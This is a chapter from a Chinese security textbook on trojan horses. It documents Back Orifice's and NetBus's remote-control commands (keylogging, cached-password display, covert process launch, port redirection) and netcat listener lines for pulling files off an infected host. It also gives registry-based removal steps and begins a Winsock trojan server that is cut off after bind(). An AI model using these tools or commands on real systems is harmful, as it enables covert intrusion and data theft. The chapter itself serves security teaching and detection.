第九章　特洛伊木馬實(shí)例及其簡單實(shí)現(xiàn)　　這里介紹一個(gè)比較陰險(xiǎn)的威脅網(wǎng)絡(luò)安全的方法：特洛伊木馬（trojan horse，或trojan）。第一節(jié)　什么是特洛伊木馬　　特洛伊木馬是一個(gè)程序，它駐留在目標(biāo)計(jì)算里。在目標(biāo)計(jì)算機(jī)系統(tǒng)啟動的時(shí)候，自動啟動。然后在某一端口進(jìn)行偵聽。如果在該端口受到數(shù)據(jù)，對這些數(shù)據(jù)進(jìn)行識別，然后按識別后的命令，在目標(biāo)計(jì)算機(jī)上執(zhí)行一些操作。比如竊取口令，拷貝或刪除文件，或重新啟動計(jì)算機(jī)。　　攻擊者一般在入侵某個(gè)系統(tǒng)后，想辦法將特洛伊拷貝到目標(biāo)計(jì)算機(jī)中。并設(shè)法運(yùn)行這個(gè)程序，從而留下后門。以后，通過運(yùn)行該特洛伊的客戶端程序，對遠(yuǎn)程計(jì)算機(jī)進(jìn)行操作。　　特洛伊木馬的一個(gè)特點(diǎn)是，它能巧妙地運(yùn)行在目標(biāo)計(jì)算機(jī)系統(tǒng)里，而不容易被發(fā)現(xiàn)。　　現(xiàn)在有許多這樣的程序。如NetCat，Back Orifice，NetBus等等。Back Orifice Back Orifice簡介　　Back Orifice是Cult of the Dead Cow (cDc)在1998年8月3日發(fā)布的。目前的下載量達(dá)到了100,000。許多人都在善意或惡意地使用這個(gè)程序。盡管這個(gè)程序并不是最優(yōu)秀的黑客工具，但由于媒體的炒做，使得這個(gè)工具給人么一個(gè)很壞的印象。　　Back Orifice被稱為“遠(yuǎn)程管理工具”。它可以附加在別的文件或程序后，也可以單獨(dú)運(yùn)行。它的服務(wù)器程序必須在目標(biāo)計(jì)算機(jī)上運(yùn)行之后，才能起到作用。一旦運(yùn)行后，用戶就不大容易感覺到它的存在。在任務(wù)列表里，根本就看不到它。該工具的服務(wù)器運(yùn)行后，就一直在一個(gè)端口偵聽從客戶機(jī)來的命令，根據(jù)不同的命令，在目標(biāo)機(jī)器上執(zhí)行相應(yīng)的操作。Back Orifice的使用　　Back Orifice（以下簡稱BO）是一個(gè)客戶機(jī)/服務(wù)器(C/S)應(yīng)用程序，其客戶機(jī)程序（以下簡稱BO客戶機(jī)）可以監(jiān)視、管理和使用其它網(wǎng)絡(luò)中運(yùn)行服務(wù)器程序（以下簡稱BO服務(wù)器）的目標(biāo)計(jì)算機(jī)所在的網(wǎng)絡(luò)資源。基于文本和基于圖形的BO客戶機(jī)是運(yùn)行在Microsoft Windows機(jī)器上。當(dāng)前版本的BO服務(wù)器只能在Windows 95/98中運(yùn)行。Back Orifice軟件包里包括：bo.txt 軟件包說明文檔。plugin.txt 插件編程文檔。boserve.exe Back Orifice服務(wù)器自安裝程序。bogui.exe 圖形界面的Back Orifice客戶機(jī)。boclient.exe 文本界面的Back Orifice客戶機(jī)。boconfig.exe 配置BO服務(wù)器程序文件名、端口、密碼和插件的工具。melt.exe 對由freeze命令壓縮的文檔解壓縮。freeze.exe 壓縮文檔。壓縮文檔可被metl命令解壓縮。　　只要運(yùn)行BO服務(wù)器程序，就可以安裝BO服務(wù)器了。當(dāng)BO服務(wù)器程序運(yùn)行時(shí)，它安裝BO服務(wù)器，然后刪除自安裝程序。此方法有助于網(wǎng)絡(luò)環(huán)境下的安裝：只要BO服務(wù)器程序被復(fù)制到Startup目錄下就行了（譯者注：因?yàn)閃indows 95/98每次啟動時(shí)都會運(yùn)行該目錄下的程序）。因?yàn)锽O服務(wù)器程序在自安裝BO服務(wù)器后就會刪除自已。一旦BO服務(wù)器被安裝到一臺機(jī)器上，它會在每次機(jī)器啟動時(shí)運(yùn)行。　　需要遠(yuǎn)程更新Back Orifice時(shí)，只要上載新版本的BO服務(wù)器程序到遠(yuǎn)程機(jī)上，使用Process spawn命令運(yùn)行它。一旦運(yùn)行，BO服務(wù)器程序?qū)⒆詣觿h除與它將要安裝的文件同名的文件，安裝自已（覆蓋舊版本），然后在安裝目錄中運(yùn)行自己，最后刪除BO服務(wù)器程序。　　在安裝前，可以配置BO服務(wù)器程序的一些參數(shù)。如安裝后的BO文件名、監(jiān)聽端口、加密密碼，都可以使用boconfig.exe工具配置。如果不進(jìn)行配置，缺省是監(jiān)聽31337端口、不使用加密密碼（數(shù)據(jù)包仍然會加密）和以" .exe"文件名安裝。　　BO客戶機(jī)通過加密了的UDP包與BO服務(wù)器通訊。要實(shí)現(xiàn)成功通訊，BO客戶機(jī)城建發(fā)送數(shù)據(jù)到BO服務(wù)器監(jiān)聽的端口，而且BO客戶機(jī)密碼必須匹配BO服務(wù)器已配置好的密碼。　　基于圖形和文本的BO客戶機(jī)都可以通過使用-p選項(xiàng)來設(shè)置BO客戶機(jī)數(shù)據(jù)包的發(fā)送端口。如果數(shù)據(jù)包被過濾或者有防火墻屏蔽，就可能需要從一個(gè)特別的、不會被過濾和屏蔽的端口發(fā)送。如果UDP連接通訊不能成功，則可能是數(shù)據(jù)包在發(fā)送或回送路徑中被過濾或者屏蔽了。　　從BO客戶機(jī)向特定的IP地址發(fā)送命令即可對BO服務(wù)器操作。如果BO服務(wù)器無靜態(tài)IP地址，則可使用以下方法：(1) 在基于文本的BO客戶機(jī)使用sweep或sweeplist命令；(2) 在基于圖形的BO客戶機(jī)使用"Ping..."對話框；(3) 設(shè)定目標(biāo)IP如"1.2.3.*"。如果掃描子網(wǎng)列表，當(dāng)有BO服務(wù)器響應(yīng)時(shí)，BO客戶機(jī)在子網(wǎng)列表目錄中瀏覽，并顯示所匹配的行和子網(wǎng)地址。（譯者注：雖然我知道如何使用，但卻無法按原文的內(nèi)容表達(dá)出來。我在以后再作詳細(xì)說明。）　　以下是在現(xiàn)在版本的Back Orifice中已經(jīng)實(shí)現(xiàn)的命令。在基于圖形和基于文本的BO客戶機(jī)里有些命令名稱不相同，但幾乎所有命令的語法格式都是一致的。在基于文本的BO客戶機(jī)中輸入 "help command"可得到更多關(guān)于命令的信息。在基于圖形的BO客戶機(jī)中有兩個(gè)參數(shù)輸入?yún)^(qū)域，這些參數(shù)作為在"Command"列表中所選擇的命令的參數(shù)。如果未給出命令所需要的參數(shù)，BO服務(wù)器將返回"Missing data"（丟失數(shù)據(jù)）。Back Orifice命令如下：（基于圖形的BO客戶機(jī)命令/基于文本的BO客戶機(jī)命令）App add/appadd在TCP端口輸出一個(gè)基于文本的應(yīng)用程序。它允許你通過Telnet對話控制基于文本或DOS的應(yīng)用程序。App del/appdel從監(jiān)聽的連接中關(guān)閉一個(gè)應(yīng)用程序。Apps list/applist列出當(dāng)前監(jiān)聽的連接中的應(yīng)用程序。Directory create/md創(chuàng)建目錄Directory list/dir列出文件和目錄。如要顯示多文件/目錄則須使用通配符。Directory remove/rd刪除目錄Export add/shareadd在BO服務(wù)器上創(chuàng)建一個(gè)“出口”（共享）。被輸出（共享）的目錄或驅(qū)動器圖標(biāo)不會出現(xiàn)共享圖標(biāo)。Export delete/sharedel刪除一個(gè)（共享）“出口”。Exports list/sharelist列出當(dāng)前共享名、共享驅(qū)動器、共享目錄、共享權(quán)限和共享密碼。File copy/copy拷貝文件。File delete/del刪除文件。File find/find在目錄中查找符合條件（支持通配符）的文件。File freeze/freeze壓縮文件。File melt/melt解壓縮文件。File view/view查看文件內(nèi)容。HTTP Disable/httpoff使HTTP服務(wù)器失效。HTTP Enable/httpon使HTTP服務(wù)器有效。Keylog begin/keylog將BO服務(wù)器上的擊鍵記錄在一個(gè)文本文件中，同時(shí)還記錄執(zhí)行輸入的窗口名。Keylog end停止擊鍵記錄。基于文本的BO客戶機(jī)使用"keylog stop"命令。MM Capture avi/capavi從視頻輸入設(shè)備（如果存在）捕捉視頻和音頻信號到avi文件中。MM Capture frame/capframe從視頻輸入設(shè)備捕捉一個(gè)視頻幀到一個(gè)位圖文件中。MM Capture screen/capscreen捕捉BO服務(wù)器屏幕影像到一們位圖文件中。MM List capture devices/listcaps列出視頻輸入設(shè)備。MM Play sound/sound在BO服務(wù)器上播放一個(gè)avi文件。Net connections/netlist列出當(dāng)前接入和接出的連接。Net delete/netdisconnect斷開BO服務(wù)器的一個(gè)網(wǎng)絡(luò)資源連接。Net use/netconnect把BO服務(wù)器連接到一個(gè)網(wǎng)絡(luò)資源。Net view/netview查看BO服務(wù)器上所有的網(wǎng)絡(luò)接口、域名、服務(wù)器和可見的共享“出口”。Ping host/pingPing主機(jī)。返回主機(jī)名和BO版本。Plugin execute/pluginexec運(yùn)行BO插件。運(yùn)行不符合BO插件接口的函數(shù)可能使B）服務(wù)器當(dāng)機(jī)。Plugin kill/pluginkill命令一個(gè)插件關(guān)閉。Plugins list/pluginlist列出當(dāng)前激活的插件和已存在的插件返回值。Process kill/prockill終止一個(gè)進(jìn)程。Process list/proclist列出運(yùn)行中的進(jìn)程。Process spawn/procspawn運(yùn)行一個(gè)程序。在基于圖形的BO客戶機(jī)程序中，如果需要確定第二個(gè)參數(shù)，進(jìn)程可能以一個(gè)正常的、可見的方式運(yùn)行，否則進(jìn)程的運(yùn)行將是隱蔽或獨(dú)立的。Redir add/rediradd重定向接入的TCP連接或UDP數(shù)據(jù)包到另一個(gè)IP地址。Redir del/redirdel停止端口重定向。Redir list/redirlist列出激活的端口重定向。Reg create key/regmakekey在注冊表中創(chuàng)建中一個(gè)主鍵。注：對于所有的注冊表命令，不要在注冊表鍵值前加入前導(dǎo)"\\"。Reg delete key/regdelkey從注冊表中刪除一個(gè)主鍵。Reg delete value/regdelval刪除注冊表中的一個(gè)鍵值。Reg list keys/reglistkeys列出注冊表中一個(gè)主鍵下的子鍵。Reg list values/reglistvals列出注冊表中一個(gè)主鍵的鍵值。Reg set value/regsetval設(shè)置注冊表一個(gè)主鍵的一個(gè)鍵值。鍵值格式為“類型,值”。對于二進(jìn)制值（類型為B），值是一個(gè)兩位的16進(jìn)制數(shù)；對于DWORD（雙字）值（類型為D），值是一個(gè)十進(jìn)制數(shù)；對于字符串值（類型為S），值是一個(gè)文本串。Resolve host/resolve解析BO服務(wù)器的主機(jī)名的IP地址。主機(jī)名可能是一個(gè)Internet主機(jī)名或本地網(wǎng)絡(luò)機(jī)器名。System dialogbox/dialog用所給出的文本和一個(gè)"OK"按鈕，在BO服務(wù)器上創(chuàng)建一個(gè)對話框。可以創(chuàng)建任意多的對話框，對話框的顯示是堆疊式的。System info/info顯示BO服務(wù)器上的系統(tǒng)信息。包括機(jī)器名、當(dāng)前用戶、CPU類型、內(nèi)存容量及可用內(nèi)存、Windows版本、驅(qū)動器信息（類型（硬盤、CDROM、可拆卸型、遠(yuǎn)程驅(qū)動器）、硬盤驅(qū)動器容量及未使用空間）。System lockup/lockup鎖住BO服務(wù)器機(jī)器。System passwords/passes顯示被緩存的當(dāng)前用戶密碼和屏幕保護(hù)密碼。所顯示的密碼中可能含有一些無用信息。（譯者注：如果密碼未被系統(tǒng)緩存，則不能顯示密碼。）System reboot/reboot關(guān)閉BO服務(wù)器主機(jī)并重啟動。TCP file receive/tcprecv將BO服務(wù)器主機(jī)連接到一個(gè)特定的IP地址和端口，并保存所接收到的數(shù)據(jù)到特定文件中。TCP file send/tcpsend將BO服務(wù)器主機(jī)連接到一個(gè)特定的IP地址和端口，發(fā)送特定文件中的內(nèi)容，然后斷開此連接。注：對于TCP文件傳輸，必須監(jiān)聽特定的IP地址和端口，直到TCP文件命令被發(fā)送，否則傳輸將會失敗。從BO服務(wù)器傳輸文件，可使用TCP文件發(fā)送命令和如下格式的netcat命令：netcat -l -p 666 > file傳輸文件到BO服務(wù)器，可使用TCP文件接收命令和如下格式的netcat命令：netcat -l -p 666 < file注：Win32版本的netcat命令在到達(dá)輸入文件末部時(shí)并不斷開連接。因此應(yīng)在文件內(nèi)容傳輸完畢后用ctrl-c或ctrl-break終止netcat命令。BOConfig:　　BOConfig.exe允許在BO服務(wù)器安裝前配置一些可選項(xiàng)。首先詢問BO服務(wù)器在系統(tǒng)目錄中安裝的可執(zhí)行文件名。它不一定是.exe，但如果你不給出擴(kuò)展名，它不會自動添加.exe擴(kuò)展名；接著詢問exe文件的描述，它描述了在注冊表中記錄的、系統(tǒng)啟動時(shí)運(yùn)行的exe文件；接著詢問BO服務(wù)器監(jiān)聽（數(shù)據(jù)包）端口；接著詢問用于加密的密碼。要實(shí)現(xiàn)BO客戶機(jī)到BO服務(wù)器的通訊，客戶機(jī)必須配置有相同的密碼，此密碼可以為空；接著詢問啟動時(shí)缺省運(yùn)行的插件。這個(gè)在BO服務(wù)器啟動時(shí)自動運(yùn)行的BO插件是以"DLL:_Function"格式定義的DLL和函數(shù)。此項(xiàng)可以為空；然后讓你輸入啟動時(shí)傳送給插件的參數(shù)，此項(xiàng)也可以為空；最后，詢問被附加到BO服務(wù)器上的文件的路徑。該文件將在BO服務(wù)器啟動時(shí)寫入系統(tǒng)目錄。此文件可以是一個(gè)自動啟動的BO插件。　　BO服務(wù)器在沒有進(jìn)行配置時(shí)也能運(yùn)行。缺省地，安裝BO服務(wù)器文件名為" .exe"，無密碼，使用端口31337通訊。已知的Bugs和問題：　　多媒體捕捉屏幕——所產(chǎn)生的位圖是按BO服務(wù)器端的顯示分辨率和像素深度保存的。因此，它可能是16位或24位顏色的。大多數(shù)圖形應(yīng)用程序只能處理8位或32位位圖，因而不能打開此位圖，或者顯示不正常（此類軟件包括Graphics Workshop for Windows、Photoshop和WANG Imaging distributed with Windows）。但是，Windows本身有一個(gè)應(yīng)用程序Paint.exe可以瀏覽這些位圖，按其提示操作即可。　　擊鍵記錄——很顯然，MS-DOS窗口未提供信息循環(huán)機(jī)制，這就使得BO無法記錄輸入到其中的擊鍵。　　基于文本的應(yīng)用程序的TCP重定向——有幾個(gè)Bugs。當(dāng)用command.com的重定向名柄輸出command.com時(shí)，系統(tǒng)同時(shí)輸出REDIR32.EXE，此程序似乎是無法終止的。這可能是由于操作系統(tǒng)接口與一個(gè)tsr模塊（該模塊在DOS對話中被裝載以重定向輸入/輸出句柄）通訊所造成的。因此，如果在應(yīng)用程序被終止（或退出）前終止TCP連接，REDIR32.exe和WINOA386.MOD（用于封裝管理舊16位應(yīng)用程序）將仍然運(yùn)行，BO和操作系統(tǒng)均無法終止它們。這會導(dǎo)致系統(tǒng)顯示"Please wait..."（請等待）屏幕且無法關(guān)機(jī)。　　某些控制臺應(yīng)用程序重定向了輸出時(shí)也可能會發(fā)生問題，如FTP.exe和boclient.exe。雖然程序的輸出因此而不能傳送出去，但仍然可能傳送輸入，所以你要通過TCP對話使該程序退出。否則使用BO殺死該進(jìn)程。Back Orifice的檢查和清除　　打開注冊表編輯器，檢查HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices主鍵的鍵值。如果你在主鍵看到的如下的一個(gè)鍵值：Name Data（缺省） " .exe" (一個(gè)空格，一個(gè)點(diǎn)號和exe后綴)　　那么你可能已經(jīng)感染上了Back Orifice了。然后在C:\WINDOWS\SYSTEM目錄下，如果發(fā)現(xiàn)一個(gè)" .exe"文件，文件大小為122K左右，那么你肯定感染了這個(gè)程序了。　　清除的方法很簡單。首先將上述主鍵中的有關(guān)" .exe"的項(xiàng)目刪除，然后重新啟動計(jì)算機(jī)。接著，將C:\WINDOWS\SYSTEM下的" .exe"刪除，最后，找一個(gè)叫WINDLL.DLL的文件，也將它刪除。　　注意，有可能你的系統(tǒng)里有好幾個(gè)Back Orifice的拷貝，要逐一清除。NetBus　　Netbus 是一個(gè)類似于著名的 Back Orifice 的黑客軟件，區(qū)別在于它的能力要強(qiáng)出太多。Netbus 通過 TCP/IP 協(xié)議，可以遠(yuǎn)程將應(yīng)用程序指派到某一套接字端口來運(yùn)行。這就相當(dāng)于說可以遠(yuǎn)程運(yùn)行目標(biāo)機(jī)器上的 cmd.exe，想想這是多么危險(xiǎn)的事情。 　　如果不是 the Cult of the Dead Cow 黑客組織在1998年的 DefCon 大會上發(fā)布 BackOrifice 工具而引起軒然大波的話，可能大多數(shù)人還不會注意到三月份發(fā)行的 Netbus。據(jù)說 Netbus 是瑞典程序員 Carl-Fredrik Neikter 為了“和朋友們消遣”而編寫的。 　　粗粗一看，Netbus 似乎沒什么危害，只允許黑客控制鼠標(biāo)，播放聲音文件，甚或打開 CD-ROM 托架。但如果深入分析，就不難發(fā)現(xiàn)其中大量的破壞性功能，特別它是基于 TCP/IP 協(xié)議在 Windows 95、Windows 98、和 Windows NT 上運(yùn)行的（與 BackOrifice 不同），這大大增加了各種入侵用戶系統(tǒng)的可能性。 　　Netbus 1.6 版能實(shí)現(xiàn)一些相當(dāng)危險(xiǎn)的操作：黑客能夠運(yùn)行遠(yuǎn)程程序，進(jìn)行屏幕抓圖，在所侵入的計(jì)算機(jī)瀏覽器中打開 URL，顯示位圖，進(jìn)行服務(wù)器管理操作（如更改口令），甚至利用遠(yuǎn)端的麥克風(fēng)錄制一段聲音。更可怕的是：它能在侵入的計(jì)算機(jī)上顯示信息，向毫無戒心的用戶提示輸入口令，再把該口令返回到入侵者的屏幕上。Netbus 還能關(guān)閉 Windows 系統(tǒng)，下載、上載或刪除文件。 　　11 月 14 日發(fā)行 的 Netbus 1.7 新增了更多不正當(dāng)?shù)墓δ堋Ｈ纾褐囟ㄏ蚬δ埽≧edirection）使黑客能夠控制網(wǎng)絡(luò)中的第三臺機(jī)器，從而偽裝成內(nèi)部客戶機(jī)。這樣，即使路由器拒絕外部地址，只允許內(nèi)部地址相互通信，黑客也依然可以占領(lǐng)其中一臺客戶機(jī)并對其它無數(shù)臺機(jī)器進(jìn)行控制。 　　V1.7 甚至還能指派應(yīng)用軟件至某個(gè)端口。以前只有 Netcat — 黑客的夢幻工具— 用于 Unix 和 NT 時(shí)才具有這種功能。例如，黑客可以將 cmd.exe 指派至 Telnet port 23，然后 Telnet 進(jìn)入該機(jī)器，從而接管系統(tǒng)的命令提示符。其危險(xiǎn)后果不言自明。 　　Netbus 的默認(rèn)狀態(tài)是在 port 12345 接收指令，在 port 12346 作應(yīng)答。Telnet 登錄到接收端口就會看到產(chǎn)品名稱及版本號，還可以修改口令。Netbus 能通過編輯 patch.ini 配置文件，把 1 到 65535 之間的任意數(shù)字指定為端口。當(dāng)需要繞過防火墻或路由過濾器時(shí)，端口通常就會設(shè)為 53（DNS）或 80（HTTP）。 　　所有的特洛伊木馬都分成兩個(gè)部分：服務(wù)器和客戶機(jī)。　　V1.7版本的NetBus的服務(wù)器的默認(rèn)文件名是patch.exe。運(yùn)行這個(gè)程序后，它將自己拷貝到Windows目錄下，并從中解開一個(gè)叫KeyHook.dll的動態(tài)連接庫。默認(rèn)的，它創(chuàng)建一個(gè)主鍵HKEY_CURRENT_USER\PATCH。并在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下創(chuàng)建了一個(gè)鍵，它的值是patch.exe文件的路徑名。這使得在每次系統(tǒng)啟動時(shí)，都能自動運(yùn)行patch.exe這個(gè)程序。除此外，還創(chuàng)建下面兩個(gè)鍵：HKEY_CURRENT_USER\NETBUS和HKEY_CURRENT_USER\NETBUS\Settings　　按照上面的描述，清除方法就自然出來了。第二節(jié)　特洛伊木馬的一個(gè)簡單實(shí)現(xiàn)通過上面的兩個(gè)實(shí)例介紹，基本上就能看出特洛伊木馬的工作原理。這里我們僅僅介紹用Winsock實(shí)現(xiàn)的一個(gè)客戶機(jī)程序和一個(gè)服務(wù)端程序。這個(gè)實(shí)例中的服務(wù)器在接到客戶機(jī)的命令后會重新啟動計(jì)算機(jī)。　　可以在這兩個(gè)程序的基礎(chǔ)上，加入一些命令，對目標(biāo)系統(tǒng)進(jìn)行一些修改。比如拷貝文件等等。　　這兩個(gè)程序是從微軟的MSDN上拿下來的，略微作了點(diǎn)增加。在VC++6.0中編譯運(yùn)行的。注意在連接的時(shí)候要加入：wsock32.lib庫。ExitWindowsEx 函數(shù)介紹ExitWindowsEx函數(shù)的功能是關(guān)閉系統(tǒng)，注銷用戶和重新啟動系統(tǒng)。它的函數(shù)原型是：BOOL ExitWindowsEx( UINT uFlags, DWORD dwReserved);第一個(gè)參數(shù)用來指定操作的類型。常見的有下面幾個(gè)：EWX_POWEROFF：關(guān)閉系統(tǒng)及關(guān)閉電源。EWX_REBOOT：重新啟動計(jì)算機(jī)。EWX_SHUTDOWN：關(guān)閉系統(tǒng)，但不關(guān)閉電源。第二個(gè)參數(shù)可以指定任意值，并沒有特定意義。具體有關(guān)在Linux和Windows下進(jìn)行SOCKET編程的細(xì)節(jié)，請參見相關(guān)章節(jié)。服務(wù)器程序：#include < windows.h> #include < winsock.h>#define PORTNUM 5000 // Port number #define MAX_PENDING_CONNECTS 4 // Maximum length of the queue // of pending connectionsint WINAPI WinMain (HINSTANCE hInstance, // Handle to the current instanceHINSTANCE hPrevInstance,// Handle to the previous instanceLPTSTR lpCmdLine, // Pointer to the command lineint nCmdShow) // Show state of the window{ int index = 0, // Integer indexiReturn; // Return value of recv functionchar szServerA[100]; // ASCII string TCHAR szServerW[100]; // UNICODE stringTCHAR szError[100]; // Error message stringSOCKET WinSocket = INVALID_SOCKET, // Window socketClientSock = INVALID_SOCKET; // Socket for communicating // between the server and clientSOCKADDR_IN local_sin, // Local socket addressaccept_sin; // Receives the address of the // connecting entityint accept_sin_len; // Length of accept_sinWSADATA WSAData; // Contains details of the Windows// Sockets implementation// Initiate Windows Sockets.if (WSAStartup (MAKEWORD(1,1), &WSAData) != 0) {wsprintf (szError, TEXT("WSAStartup failed. Error: %d"), WSAGetLastError ());MessageBox (NULL, szError, TEXT("Error"), MB_OK);return FALSE;}// Create a TCP/IP socket, WinSocket.if ((WinSocket = socket (AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {wsprintf (szError, TEXT("Allocating socket failed. Error: %d"), WSAGetLastError ());MessageBox (NULL, szError, TEXT("Error"), MB_OK);return FALSE;}// Fill out the local socket's address information.local_sin.sin_family = AF_INET;local_sin.sin_port = htons (PORTNUM); local_sin.sin_addr.s_addr = htonl (INADDR_ANY);// Associate the local address with WinSocket.if (bind (WinSocket, (struct sockaddr *) &local_sin, sizeof (local_sin)) == SOCKET_ERROR) {wsprintf (szError, TEXT("Binding socket failed. Error: %d"), WSAGetLastError ());MessageBox (NULL, szError, TEXT("Error"), MB_OK);closesocket (WinSocket);return FALSE;}